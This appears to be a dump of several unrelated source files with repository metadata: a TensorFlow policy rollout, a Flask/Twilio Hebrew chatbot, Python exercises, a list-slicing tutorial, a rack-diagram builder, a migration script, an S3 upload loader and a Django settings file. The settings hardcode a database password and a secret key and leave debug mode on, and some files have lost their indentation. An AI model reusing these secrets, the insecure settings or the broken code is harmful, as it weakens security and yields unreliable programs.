        # Zero-initialized weights/biases; real values come from the checkpoint restore below.
        weight_init = tf.random_uniform_initializer(0, 0)
        bias_init = tf.constant_initializer(0)

        # Graph placeholders (advantage/old-dist ones are unused here but kept
        # so the restored variable scopes line up with training).
        self.obs = tf.placeholder(tf.float32, [None, self.observation_size])
        self.action = tf.placeholder(tf.float32, [None, self.action_size])
        self.advantage = tf.placeholder(tf.float32, [None])
        self.oldaction_dist_mu = tf.placeholder(tf.float32, [None, self.action_size])
        self.oldaction_dist_logstd = tf.placeholder(tf.float32, [None, self.action_size])

        self.policymode = "single"
        if self.policymode == "single":
            with tf.variable_scope("policy"):
                h1 = fully_connected(self.obs, self.observation_size, self.hidden_size, weight_init, bias_init, "policy_h1")
                h1 = tf.nn.relu(h1)
                h2 = fully_connected(h1, self.hidden_size, self.hidden_size, weight_init, bias_init, "policy_h2")
                h2 = tf.nn.relu(h2)
                h3 = fully_connected(h2, self.hidden_size, self.action_size, weight_init, bias_init, "policy_h3")
                action_dist_logstd_param = tf.Variable((.01*np.random.randn(1, self.action_size)).astype(np.float32), name="policy_logstd")
                # means for each action
                self.action_dist_mu = h3
                # log standard deviations for each actions
                self.action_dist_logstd = tf.tile(action_dist_logstd_param, tf.pack((tf.shape(self.action_dist_mu)[0], 1)))
        elif self.policymode == "multiple":
            # One tiny network per action dimension, concatenated afterwards.
            action_outputs = []
            action_logstds = []
            for i in xrange(self.action_size):
                with tf.variable_scope("policy"+str(i)):
                    h1 = fully_connected(self.obs, self.observation_size, self.hidden_size, weight_init, bias_init, "policy_h1")
                    h1 = tf.nn.relu(h1)
                    h2 = fully_connected(h1, self.hidden_size, self.hidden_size, weight_init, bias_init, "policy_h2")
                    h2 = tf.nn.relu(h2)
                    h3 = fully_connected(h2, self.hidden_size, 1, weight_init, bias_init, "policy_h3")
                    action_dist_logstd_param = tf.Variable((.01*np.random.randn(1, 1)).astype(np.float32), name="policy_logstd")
                    action_outputs.append(h3)
                    action_logstds.append(action_dist_logstd_param)
            # means for each action
            self.action_dist_mu = tf.concat(1, action_outputs)
            # log standard deviations for each actions
            self.action_dist_logstd = tf.tile(tf.concat(1, action_logstds), tf.pack((tf.shape(self.action_dist_mu)[0], 1)))

        # CPU-only session.
        config = tf.ConfigProto(
            device_count = {'GPU': 0}
        )
        self.session = tf.Session(config=config)
        self.session.run(tf.initialize_all_variables())
        var_list = tf.trainable_variables()

        self.set_policy = SetPolicyWeights(self.session, var_list)

        # Restore trained weights from ./training/.
        self.saver = tf.train.Saver()
        self.saver.restore(self.session, tf.train.latest_checkpoint(os.getcwd()+"/training/"))
# Roll out the restored policy in the gym environment, rendering each step.
# NOTE(review): Python 2 script (print statement, xrange, raw_input); `filter`
# presumably comes from utils and normalizes observations — confirm.
task = "Reacher-v1"
the_env = gym.make(task)
p = Policy(the_env.observation_space, the_env.action_space)

# saved_policy = np.load("policy.npy")
# for p in saved_policy:
#     print p.shape
# p.set_policy(saved_policy)

ob = filter(the_env.reset())
for x in xrange(100):
    obs = np.expand_dims(ob, 0)
    action_dist_mu, action_dist_logstd = p.session.run([p.action_dist_mu, p.action_dist_logstd], feed_dict={p.obs: obs})
    # samples the guassian distribution
    act = action_dist_mu + np.exp(action_dist_logstd)*np.random.randn(*action_dist_logstd.shape)
    ar = act.ravel()
    print ar
    res = the_env.step(ar)
    ob = filter(res[0])
    the_env.render()
    # Pause until the user presses Enter (shows the step index).
    raw_input(x)
| [
"kevin@bobthechicken.com"
] | kevin@bobthechicken.com |
543a88f853a1e518b01143a3870652ad879a269a | b51341a9411d48be0214ab84ffebe881b52bc352 | /app.py | 88a4f4359d7f067146d4d3fdaebe717349d5c654 | [] | no_license | charan-kumardot/smartphonebot | 52a89a99a78b1966ae2f5d028aacaeee5de05eee | 2347b6987b942f84abc4c458a1a0fb5332ce59a8 | refs/heads/main | 2023-02-19T00:17:12.665043 | 2021-01-19T16:19:47 | 2021-01-19T16:19:47 | 330,577,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,462 | py | from cht import Chat,reflections
from flask import Flask, render_template, request
from twilio.twiml.messaging_response import MessagingResponse
app = Flask(__name__, template_folder='templates')
pairs =[
['(good|hlo|welcome|hello|Hi|hey|שלום|ברוך הבא|בוקר טוב|היי|מה שלומך|הוא|טוֹב|הי|סליחה|אפשר|עזרה)', ['''
ברוכים הבאים למגן סלולרי בהשגחה פרטית, איך אפשר לעזור?
לעזרה ברכישת מכשיר לחץ 1
לעזרה בנושאי שירות לקוחות לחץ 2
תרצו לדבר עם מנהל מכירות לחץ 3
''']],
['(1)', ['באיזה מכשיר אתם מתעניינים?']],
['(2)', ['''
לקוח יקר אם ברשותך מערכת סינון והגנה מבית מושגח פלוס
נא לפנות בכל פנייה לגבי חנות האפליקציות, להוסיף אפליקציה להגביר רמת סינון וכו'...
אל מוקד שירות לקוחות אפליקצית מושגח
בימים א-ה בין השעות 10:00-17:00 : 058-3777779
ניתן גם לפנות אלינו(מומלץ) גם במייל: mp058377@gmail.com
לקוח נכבד, אם ברשותך מערכת סינון והגנה מבית כושר פליי
נא לפנות בכל פנייה לגבי חנות האפליקציות, להוסיף אפליקציה להגביר רמת סינון וכו'...
אל מוקד שירות לקוחות ווטסאפ (לוחצים על המעטפה)
אפליקצית כושר פליי 053-312-3889
ניתן גם לפנות אלינו(מומלץ) גם במייל: kosherplay@gmail.com
נא לשמור על הקופסא ושטר האחריות
תקשורת טובה היא שם המשחק תרגישו חופשי לשתף אותנו
תשאלו תבררו אנחנו כאן לעזור לכם… במייל ובטלפון איך שנוח לכם.
''']],
['(3)', ['רשום בבקשה את מספר הטלפון שלך ונציג יחזור אליך בהקדם']],
[
'([\d{8,15}]|(\d{3}[-\.\s]??\d{3}[-\.\s]??\d{4}|\(\d{3}\)\s*\d{3}[-\.\s]??\d{4}|\d{3}[-\.\s]??\d{4})|^(?:00|\\+)[0-9\\s.\\/-]{6,20}$)',
['תודה רבה מצוות המגן סלולרי בהשגחה פרטית']],
['(.*)', ['רשום בבקשה את מספר הטלפון שלך ונציג יחזור אליך בהקדם']]
]
@app.route('/', methods=['GET', 'POST'])
def samplefunction():
if request.method == 'GET':
return render_template('index.html')
if request.method == 'POST':
greetIn = request.form['human']
greetOut = c(greetIn)
return render_template('index.html',bot1 = greetOut,bot2 = greetIn)
def c(x):
chat = Chat(pairs,reflections)
return chat.respond(x)
@app.route("/sms", methods=['GET', 'POST'])
def sms_reply():
"""Respond to incoming with a simple text message."""
resp = MessagingResponse()
phoneno = request.form.get('From')
msg = request.form.get('Body')
chat = Chat(pairs, reflections)
print(msg)
resp.message(chat.respond(msg))
return str(resp)
if __name__ == '__main__':
app. run(host='127.0.4.21', port=4040)
| [
"noreply@github.com"
] | noreply@github.com |
f92d14e56e3f2106526540e9015138bc89fc3d77 | c12008fee6b319ccc683956d0a171a00e12debb0 | /everyday/e191020.py | 53e6428caf621fada6c4bfabfffe7d54a1250dd8 | [] | no_license | yrnana/algorithm | 70c7b34c82b15598494103bdb49b4aefc7c53548 | 783e4f9a45baf8d6b5900e442d32c2b6f73487d0 | refs/heads/master | 2022-04-13T23:50:53.914225 | 2020-04-01T12:41:14 | 2020-04-01T12:41:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | def solution(arr):
l = len(arr)
n = 0
for i in range(l):
if arr[i] != 0:
swap(arr, i, n)
n += 1
return arr
def swap(arr, i, j):
tmp = arr[i]
arr[i] = arr[j]
arr[j] = tmp
print(solution([0, 5, 0, 3, -1]))
print(solution([3, 0, 3]))
| [
"nyryn0945@gmail.com"
] | nyryn0945@gmail.com |
cb002e1559544ff2efdbb9c0ae44c92d54398282 | 8ce5eaba8a2848c17f9a47eb083afdd90887e17e | /scripts/loading/suppl_files/load_pubmed_PMC_files.py | e8c7834e02a0481d3d93a121e901d44195f54939 | [
"MIT"
] | permissive | yeastgenome/SGDBackend-Nex2 | cad926729f9da738b3e82fc85d29b936ed6b8f1a | 017e7248fbc3f1d1e8062d67f26937ec00c3cb8a | refs/heads/master | 2023-08-23T12:24:15.220178 | 2023-06-22T01:22:11 | 2023-06-22T01:22:11 | 46,740,355 | 5 | 7 | MIT | 2023-09-06T20:28:05 | 2015-11-23T18:40:33 | Python | UTF-8 | Python | false | false | 4,239 | py | from src.helpers import upload_file
from src.boto3_upload import upload_one_file_to_s3
from scripts.loading.database_session import get_session
from src.models import Dbentity, Filedbentity, Referencedbentity, Edam,\
FilePath, Path, ReferenceFile, Source
from datetime import datetime
import logging
import os
import sys
import gzip
import logging
__author__ = 'sweng66'
logging.basicConfig(format='%(message)s')
log = logging.getLogger()
log.setLevel(logging.INFO)
CREATED_BY = os.environ['DEFAULT_USER']
supplFileDir = "scripts/loading/suppl_files/pubmed_pmc_download/"
def load_data():
nex_session = get_session()
log.info(datetime.now())
log.info("Getting data from database...")
edam_to_id = dict([(x.format_name, x.edam_id) for x in nex_session.query(Edam).all()])
src = nex_session.query(Source).filter_by(display_name='SGD').one_or_none()
source_id = src.source_id
pmid_to_reference_id_year = dict([(x.pmid, (x.dbentity_id, x.year)) for x in nex_session.query(Referencedbentity).filter(Referencedbentity.pmid.isnot(None)).all()])
log.info(datetime.now())
log.info("Uploading files to s3...")
i = 0
for suppl_file in os.listdir(supplFileDir):
i += 1
pmid = int(suppl_file.replace('.tar.gz', ''))
if pmid in pmid_to_reference_id_year:
(reference_id, year) = pmid_to_reference_id_year[pmid]
update_database_load_file_to_s3(nex_session, i, suppl_file, source_id, edam_to_id, year, reference_id)
else:
log.info("PMID:" + str(pmid) + " is not in the database.")
nex_session.close()
log.info(datetime.now())
log.info("Done!")
def update_database_load_file_to_s3(nex_session, count, suppl_file_name, source_id, edam_to_id, year, reference_id):
suppl_file_with_path = supplFileDir + suppl_file_name
local_file = open(suppl_file_with_path, mode='rb')
import hashlib
md5sum = hashlib.md5(suppl_file_with_path.encode()).hexdigest()
row = nex_session.query(Filedbentity).filter_by(md5sum=md5sum).one_or_none()
if row is not None:
return
row = nex_session.query(Dbentity).filter(Dbentity.display_name == suppl_file_name).all()
if len(row) > 0:
return
data_id = edam_to_id.get('EDAM:2526')
topic_id = edam_to_id.get('EDAM:3070')
format_id = edam_to_id.get('EDAM:2330')
from sqlalchemy import create_engine
from src.models import DBSession
engine = create_engine(os.environ['NEX2_URI'], pool_recycle=3600)
DBSession.configure(bind=engine)
upload_file(CREATED_BY, local_file,
filename=suppl_file_name,
file_extension='gz',
description='PubMed Central download',
display_name=suppl_file_name,
year=year,
data_id=data_id,
format_id=format_id,
topic_id=topic_id,
status='Active',
is_public=True,
is_in_spell=False,
is_in_browser=False,
file_date=datetime.now(),
source_id=source_id,
md5sum=md5sum)
row = nex_session.query(Dbentity).filter_by(display_name=suppl_file_name, dbentity_status='Active').one_or_none()
if row is None:
log.info("The " + suppl_file_name + " is not in the database.")
return
file_id = row.dbentity_id
path = nex_session.query(Path).filter_by(
path="/supplemental_data").one_or_none()
if path is None:
log.info("The path /supplemental_data is not in the database.")
return
path_id = path.path_id
x = FilePath(file_id=file_id,
path_id=path_id,
source_id=source_id,
created_by=CREATED_BY)
nex_session.add(x)
x = ReferenceFile(file_id=file_id,
reference_id=reference_id,
file_type='Supplemental',
source_id=source_id,
created_by=CREATED_BY)
nex_session.add(x)
nex_session.commit()
log.info(str(count) + " done uploading " + suppl_file_name)
if __name__ == '__main__':
load_data()
| [
"noreply@github.com"
] | noreply@github.com |
1d3a69f3fca58fe93dbc386743538093df884e7d | 444e1626df9ff13af6b65ae3dd8b68fdce91de62 | /class_practice2.py | 28d885c6945bf872f6ba9663c1bd51a81308f6d3 | [] | no_license | yash94749/myrepos | 3de56748e506f54a4cfe5ff13f530851873ab5fe | 86ad72637c2de6594fce5afd71270878faf7bee8 | refs/heads/master | 2020-03-12T08:57:21.408278 | 2018-04-22T06:49:34 | 2018-04-22T06:49:34 | 130,540,946 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,045 | py | class company:
def __init__(self,Name,location,types):
self.CompanyName = Name
self.CompanyLocation = location
self.CompanyDomain = types
self.CompanyWebsite = 'www' + '.' + Name + '.com'
class Employee(company):
amount = 1.04
def __init__(self,Name,location,types,emp_first_Name,emp_last_Name,emp_salary):
company.__init__(self,Name,location,types)
self.Emp_FirstName = emp_first_Name
self.Emp_LastName = emp_last_Name
self.Emp_pay = emp_salary
self.emp_email =self.Emp_FirstName + '.' + self.Emp_LastName + '@' + self.CompanyName + '.com'
def emp_raise_salary(self):
return (self.Emp_pay * self.amount)
##cmp1 = company.emp_details('amazon','pune',60000)
###print(cmp1.emp_details('Yashwant','Singh',60000).emp_email)
##print (cmp1.emp_email)
emp1=Employee('amazon','pune','IT','Yashwant','Singh',60000)
print (emp1.CompanyWebsite)
print (emp1.Emp_pay)
print (emp1.emp_raise_salary())
emp1.amount = 10
print (emp1.emp_raise_salary())
| [
"0128it@gmail.com"
] | 0128it@gmail.com |
e7fa14ad1683f757c0af7cb0b591d2e67a9b53df | 4ffee6a04d44c44b3ce4edf50e78dd0a9205db01 | /Datastructures/index_2.py | 64bbfc5476c2a1d12aafa5b462b1c238478e7bf2 | [] | no_license | BercziSandor/pythonCourse_2020_09 | 075fd6481821f32b83aed71ea85fbaeb4d2d3777 | 43144edcc6f114df9568245026276c772f32b79c | refs/heads/master | 2023-04-01T23:09:44.306936 | 2021-03-22T08:32:20 | 2021-03-22T08:32:20 | 299,989,127 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,457 | py | # Értékadás slicing segítségével.
lst = [10, 20, 30, 40, 50]
# Az 1, 2, 3 indexű elemeket le akarjuk cserélni erre: [-2, -3, -4]
lst[1:4] = [-2, -3, -4]
print(lst) # [10, -2, -3, -4, 50]
#######################################
# Ha slicing segítségével végzünk értékadást, akkor az új elemnek egy iterálható
# sorozatnak kell lennie, amelynek az elemei kerülnek be. Ez tehát NEM működik:
lst = [10, 20, 30, 40, 50]
lst[1:4] = 99 # TypeError: can assign only an iterable
#######################################
# Az új sorozat lehet más elemszámú, mint az eredeti:
lst = [10, 20, 30, 40, 50]
lst[1:4] = [-100]
print(lst) # [10, -100, 50]
# A felső határ túlcímzése most sem okoz gondot:
lst = [10, 20, 30, 40, 50]
lst[1:100] = [-2, -3, -4]
print(lst) # [10, -2, -3, -4]
# Ha a kezdő index túl van a lista végén, akkor az elemek hozzáfűződnek a lista végéhez:
lst = [10, 20, 30, 40, 50]
lst[10:100] = [-2, -3, -4]
print(lst) # [10, 20, 30, 40, 50, -2, -3, -4]
# Ha a kezdő index túl van a lista elején, akkor az elemek hozzáfűződnek a lista
# eleje elé:
lst = [10, 20, 30, 40, 50]
lst[-6:1] = [-2, -3, -4]
print(lst) # [-2, -3, -4, 10, 20, 30, 40, 50]
#######################################
# Nyilván egyetlen elemet is le lehet cserélni:
lst = [10, 20, 30, 40, 50]
lst[1:1] = [99, 100]
print(lst) # [10, 99, 100, 30, 40, 50]
#######################################
# A lista helyben marad megváltozott tartalommal:
lst_1 = [10, 20, 30, 40, 50]
lst_2 = lst_1
lst_1[1:1] = [99, 100]
print(lst_2) # [10, 99, 100, 30, 40, 50]
# Így tudunk tehát helyben új listát létrehozni:
lst_1 = [10, 20, 30, 40, 50]
lst_2 = lst_1
lst_1[:] = [99, 100]
print(lst_2) # [99, 100]
#######################################
# A beillesztendő értéksorozat persze nem csak lista, hanem tetszőleges iterálható
# sorozat lehet:
lst = [10, 20, 30, 40, 50]
lst[1:4] = (-2, -3, -4)
print(lst) # [10, -2, -3, -4, 50]
lst = [10, 20, 30, 40, 50]
lst[1:4] = range(5)
print(lst) # [10, 0, 1, 2, 3, 4, 50]
lst = [10, 20, 30, 40, 50]
dic = {'A': 1, 'B': 2}
lst[1:4] = dic.keys()
print(lst) # [10, 'A', 'B', 50] -- a sorrend 3.6 verzió előtt nem garantált!
#######################################
# Törlés slicing segítségével.
lst = [10, 20, 30, 40, 50]
del(lst[1:4])
print(lst) # [10, 50]
lst = [10, 20, 30, 40, 50]
del(lst[1:100])
print(lst) # [10]
#######################################
| [
"Sandor.Berczi@t-systems.com"
] | Sandor.Berczi@t-systems.com |
e3537da9193eb857a9a504c5b9dabd21764f97f7 | 4ff20bb90b85de0adf9f1957a1790b7c6d1fc4b6 | /AssetMP/api.py | 724e26ee8c148ff409154daa35b643fcaa93f510 | [] | no_license | suzihua666/AssetMP | d8544a086536e928b6fccf4268aba79fdab6cddf | c31d3d1e678207547471ad13acda5618773530d8 | refs/heads/master | 2022-05-11T21:53:56.437998 | 2019-02-28T08:04:00 | 2019-02-28T08:04:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,103 | py | # -*- coding: utf-8 -*-
# @Author: richard
# @Date: 2018-04-11 14:35:54
# @Last Modified by: richardzgt
# @Last Modified time: 2018-09-05 14:31:00
# Purpose:
#
from django.http import HttpResponse, Http404
from django.db.models.query import QuerySet
from django.core import serializers
from django.core.paginator import Paginator, EmptyPage, InvalidPage
from models import Asset,group_by
from settings import *
import logging
import logging
import json
import copy
logger = logging.getLogger("bench")
class AmpException(Exception):
def __init__(self, msg, fault):
self.message = str(msg)
self.fault = str(fault)
def __str__(self):
return "[%s]: %s" % (self.fault, self.message)
def set_log(level, filename='AssetMP.log'):
"""
return a log file object
根据提示设置log打印
"""
log_file = os.path.join(LOG_DIR, filename)
if not os.path.isfile(log_file):
os.mknod(log_file)
os.chmod(log_file, 0777)
log_level_total = {'debug': logging.DEBUG, 'info': logging.INFO, 'warning': logging.WARN, 'error': logging.ERROR,
'critical': logging.CRITICAL}
logger_f = logging.getLogger('AssetMP')
logger_f.setLevel(logging.DEBUG)
fh = logging.FileHandler(log_file)
fh.setLevel(log_level_total.get(level, logging.DEBUG))
formatter = logging.Formatter('%(asctime)s - [%(filename)s:%(lineno)d:%(funcName)s] - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger_f.addHandler(fh)
return logger_f
# logger = set_log(LOG_LEVEL)
def json_returner(data=''):
if isinstance(data,(QuerySet,dict)):
ret = serializers.serialize("json",data)
return HttpResponse(json.dumps({'status':'success','message':ret}))
return HttpResponse(json.dumps({'status':'failed','message':data}))
def get_rack_rail_template(idc,assets):
"""
paramter: idc_
"""
all_assets = Asset.objects.filter(idc=idc)
if assets:
all_assets = assets
# 根据机架分组
cabinets = group_by(all_assets,'cabinet')
cabinets_template = ""
logger.debug("all_assets[%s] to render", all_assets)
for cabinet in sorted(cabinets):
all_cab_ass = all_assets.filter(cabinet=cabinet)
rest = []
s = """
<div name="{0}" class="rack">
<table class="data-table" id="data_table">
<tbody>
<tr>
<td><p class="rackname">{0}</p></td>
</tr>
""".format(cabinet)
s1 = """
<tr>
<td><img src="/static/cabinetmaps/server1U.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
s2 = """
<tr>
<td rowspan="2" class="u2server"><img src="/static/cabinetmaps/server.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
s4 = """
<tr>
<td rowspan="4" class="u4server"><img src="/static/cabinetmaps/r930.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
st = """
<tr>
<td><img src="/static/cabinetmaps/net.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
sf = """
<tr>
<td><img src="/static/cabinetmaps/fw.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
sm = """
<tr>
<td></td>
</tr>
"""
sb = """
<tr>
<td><img src="/static/cabinetmaps/blank.png" class="timg"></td>
</tr>
"""
sn = "</tbody></table></div>"
count_rail = 41
# 下次用递归函数改写下
while count_rail >= 1:
flag = 0
for ass in all_cab_ass:
if count_rail == ass.railnum:
flag = 1
# if ass.railnum == 35: print ass,"=============="
if ass.machine_type == 3:
if ass.get_uhight_display() == 1:
_s1 = copy.deepcopy(s1)
_s1 = _s1 % ass.id
s += _s1
count_rail -= 1
elif ass.get_uhight_display() == 2:
_s2 = copy.deepcopy(s2)
_s2 = _s2 % ass.id
s += _s2 + sm
count_rail -= 2
elif ass.get_uhight_display() == 4:
_s4 = copy.deepcopy(s4)
_s4 = _s4 % ass.id
s += _s4 + sm*3
count_rail -= 4
elif ass.machine_type == 2 :
_st = copy.deepcopy(st)
_st = _st % ass.id
s += _st
count_rail -= 1
elif ass.machine_type in (0 , 1):
_sf = copy.deepcopy(sf)
_sf = _sf % ass.id
s += _sf
count_rail -= 1
else:
return False
if flag == 0:
s += sb
count_rail -= 1
print count_rail,"-----count_rail ------"
s += sn
cabinets_template += '\n' + s
logger.debug(cabinets_template)
return cabinets_template
def page_list_return(total, current=1):
"""
page
分页,返回本次分页的最小页数到最大页数列表
"""
min_page = current - 2 if current - 4 > 0 else 1
max_page = min_page + 4 if min_page + 4 < total else total
return range(min_page, max_page + 1)
def pages(post_objects, request):
"""
page public function , return page's object tuple
分页公用函数,返回分页的对象元组
"""
per_page = request.GET.get("per_page",20)
paginator = Paginator(post_objects, per_page)
try:
current_page = int(request.GET.get('page', '1'))
except ValueError:
current_page = 1
page_range = page_list_return(len(paginator.page_range), current_page)
try:
page_objects = paginator.page(current_page)
except (EmptyPage, InvalidPage):
page_objects = paginator.page(paginator.num_pages)
if current_page >= 5:
show_first = 1
else:
show_first = 0
if current_page <= (len(paginator.page_range) - 3):
show_end = 1
else:
show_end = 0
# 所有对象, 分页器, 本页对象, 所有页码, 本页页码,是否显示第一页,是否显示最后一页
return post_objects, paginator, page_objects, page_range, current_page, show_first, show_end
| [
"gaotao@huored.com"
] | gaotao@huored.com |
c3493467acffb606aefbbf9f4ca1107f40f79470 | 1332983c07bbecc16ec694a10d9557100b8af031 | /Front-End/distance.py | 7768d20a848df20f3260370a2f96a554b47d689c | [] | no_license | kkuzminskas/cs3235 | c37487580164cf2a1238aac75770375b975ef191 | 577e656316120ca29542e45699ba5f3f21972a18 | refs/heads/master | 2023-01-09T07:30:40.673905 | 2019-11-13T06:52:11 | 2019-11-13T06:52:11 | 216,753,016 | 0 | 2 | null | 2023-01-04T23:38:04 | 2019-10-22T07:43:38 | Python | UTF-8 | Python | false | false | 1,316 | py |
import prep_data
import dist_analysis
import json
import numpy as np
def extract_norm_x_y_t(filename):
try:
file = open(filename, "r")
data = file.read()
data = json.loads(data)['all']
except:
prep_data.clean_data(filename)
return extract_norm_x_y_t
tracking_data = [l for l in data if l['category'] ==
"tracker" and l['values']['frame']['state'] == 7]
time_stamps = np.array([l['values']['frame']['time']
for l in tracking_data])
time_stamps = time_stamps - time_stamps[0]
x_y_data = np.array([(l['values']['frame']['avg']['x'],
l['values']['frame']['avg']['y']) for l in tracking_data])
x_y_t = np.concatenate((x_y_data, time_stamps.T.reshape((len(x_y_data), 1))), axis=1)
return dist_analysis.whiten(x_y_t)
def eyenalysis(filename):
reference_files = [f"../data/siqi{i+1}.txt" for i in range(8)]
norm_x_y_t = extract_norm_x_y_t(filename)
sum = 0
for f in reference_files:
ref_norm_x_y_t = extract_norm_x_y_t(f)
sum += dist_analysis.eyenalysis_distance(norm_x_y_t, ref_norm_x_y_t)
# threshold determined experimentally
#return (sum / len(reference_files)) < 0.78549708
return (sum /len(reference_files)) <0.70588 | [
"kendallkuzminskas2020@u.northwestern.edu"
] | kendallkuzminskas2020@u.northwestern.edu |
4c0ef9a83233da4c94a5a82848e953f60b8f5ccb | 92d7e64212dfc4ef025eb1da6ac745d86b45482d | /hello.py | 7c97d7be985a9ff8e01c53aa200ae24c80910687 | [
"MIT"
] | permissive | abhishekanand/leetcode | 1be6c4cfae1d00735f064d10194d1ccd3a9d0ecf | f1f86d20312561ec599f076587d696d126e88bdd | refs/heads/master | 2020-03-13T19:54:33.674946 | 2018-07-06T06:34:37 | 2018-07-06T06:34:37 | 131,263,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | import pandas as pd
import os
x = 5
print("Hello world!")
| [
"noreply@github.com"
] | noreply@github.com |
e153e5d4b04c8b4638087b42cd4998c8931ec241 | 595854e3b2095736efe18eba0f64823924cff4f3 | /cooking/asgi.py | de4ee270d33d87e5c8b767ee1124308605f40210 | [] | no_license | saigurrampati/recipe | 9c50640ced95c2369339a8b38372803381a1f1fb | e5d6f4265073418a266aaf65ab6c5232053e555f | refs/heads/main | 2023-06-05T12:56:36.389085 | 2021-05-07T07:41:11 | 2021-05-07T07:41:11 | 363,030,628 | 0 | 0 | null | 2021-06-28T02:31:33 | 2021-04-30T04:57:13 | Python | UTF-8 | Python | false | false | 391 | py | """
ASGI config for cooking project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cooking.settings')
application = get_asgi_application()
| [
"g.saikumarreddy19@gmail.com"
] | g.saikumarreddy19@gmail.com |
6c16e2c8f646a76de7c95d1bce0bd8207155521e | 5d0dd50d7f7bf55126834292140ed66306e59f10 | /MIGRATE/msgpack_to_sql.py | 4ce966fdef93c6b79fcabe824ec1177b571c63de | [] | no_license | JellyWX/tracker-bot | 32d2c8666a7c6ca0835aa94695be4ccd7fc37bb5 | b0909c4883b0ee6e0300a163e94ea0d69dffa062 | refs/heads/master | 2021-05-02T16:14:11.638292 | 2018-04-26T19:47:50 | 2018-04-26T19:47:50 | 120,670,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | import msgpack
import sqlite3
with open('../DATA/USER_DATA', 'rb') as f:
data = msgpack.unpack(f, encoding='utf8')
connection = sqlite3.connect('../DATA/data.db')
cursor = connection.cursor()
for user, values in data.items():
command = '''CREATE TABLE u{user} (
game VARCHAR(50),
time INT
)
'''.format(user=user)
cursor.execute(command)
for game, time in values.items():
command = '''INSERT INTO u{user} (game, time)
VALUES (?, ?);'''.format(user=user)
cursor.execute(command, (game, time))
connection.commit()
connection.close()
| [
"judewrs@gmail.com"
] | judewrs@gmail.com |
463cb930ed33d88b8c55dfbae8cb4eb3ce6e48c8 | 782ef5f9dfa872590409a568973c56be8072597d | /project/settings.py | b0984615b18207eccda51b3da8bc3dc698c5b089 | [] | no_license | heraldmatias/liceolncc | 34fa013bdcc31c1595699207b9494db8f8713c22 | 02931da47936e3c5c41dfe6d0e250acc837c6fba | refs/heads/master | 2021-01-22T06:37:00.810302 | 2012-08-15T23:36:14 | 2012-08-15T23:36:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,145 | py | # -*- coding: utf-8 -*-
# Django settings for project project.
from os.path import dirname, join, realpath, split
SYSTEM_PATH, PROJECT_DIR = split(realpath(dirname(__file__)))
ADMINS = (
('Herald Olivares', 'heraldmatias.oz@gmail.com'),
('Moises Ibanez', 'moics30@gmail.com'),
)
FCGI_OPTIONS = {
'method': 'threaded',
}
MANAGERS = ADMINS
DEBUG=True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'plataforma', # Or path to database file if using sqlite3.
'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'ollanta2011', # Not used with sqlite3.i
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
'OPTIONS': {
'init_command': 'SET storage_engine=INNODB',
}
}
}
DEFAULT_FROM_EMAIL = 'prensa@presidencia.gob.pe'
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Lima'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'es-PE'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = realpath(join(SYSTEM_PATH, 'media'))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = realpath(join(SYSTEM_PATH, 'static'))
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = STATIC_URL + "grappelli/"
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '+28r#@97t-sbf(6_r!nucte+z!jr**sv07n6q_lj28c5yhx#eq'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
